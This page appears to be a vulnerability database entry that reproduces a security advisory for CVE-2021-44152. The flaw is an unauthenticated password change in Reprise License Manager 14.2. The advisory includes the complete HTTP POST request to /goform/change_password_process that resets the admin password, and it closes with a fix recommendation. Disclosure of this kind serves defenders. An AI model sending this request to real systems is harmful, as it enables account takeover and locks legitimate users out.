Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Reprise License Manager 14.2 Unauthenticated Password Change

🗓️ 08 Dec 2021 00:00:00Reported by Andreas Fyhn Andersen, Mark Staal Steenberg, Oliver Lind Nordestgaard, Gionathan Armando Reale, Bilal El GhoulType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 398 Views

Reprise License Manager 14.2 Unauthenticated Password Change CVE-2021-4415

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Reprise License Manager 14.2 Unauthenticated Password Change Vulnerability
8 Dec 202100:00
zdt
Circl		CVE-2021-44152
13 Dec 202107:12
circl
CNNVD		Reprise Software Reprise License Manager 访问控制错误漏洞
8 Dec 202100:00
cnnvd
CNVD		Reprise Software Reprise License Manager Licensing Issue Vulnerability (CNVD-2022-05755)
12 Dec 202100:00
cnvd
CVE		CVE-2021-44152
13 Dec 202100:00
cve
Cvelist		CVE-2021-44152
13 Dec 202100:00
cvelist
Nuclei		Reprise License Manager 14.2 - Authentication Bypass
6 Jun 202603:01
nuclei
NVD		CVE-2021-44152
13 Dec 202104:15
nvd
OSV		CVE-2021-44152
13 Dec 202104:15
osv
Prion		Authentication flaw
13 Dec 202104:15
prion
Rows per page
`  
# Product: Reprise License Manager 14.2  
# Vendor: Reprise Software  
# CVE ID: CVE-2021-44152  
# Vulnerability Title: Unauthenticated Password Change  
# Severity: High  
# Author(s): Mark Staal Steenberg, Bilal El Ghoul, Gionathan Armando Reale, Andreas Fyhn Andersen, Oliver Lind Nordestgaard   
# Date: 2021-11-25  
#############################################################  
Introduction:  
Because /goform/change_password_process does not verify authentication or authorization, an unauthenticated user can change the password of any existing user. This allows an attacker to change the password of any known user, thereby preventing valid users from accessing the system and granting the attacker full access to that user's account.  
  
Vulnerability:  
If an unauthenticated user sends the following HTTP request they can change the password of any user:  
  
POST /goform/change_password_process HTTP/1.1  
Host: 127.0.0.1:5054  
Content-Length: 53  
  
pw1=passwd&pw2=passwd&user=admin&ok=CHANGE%2BPASSWORD  
  
Recommendation:  
Ensure that authentication is required prior to password change requests and that users cannot modify or change passwords of others users.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Dec 2021 00:00Current
EPSS0.62379
reprise license manager 14.2unauthenticated password changecve-2021-44152authorization verificationpassword modificationsecurity recommendation
398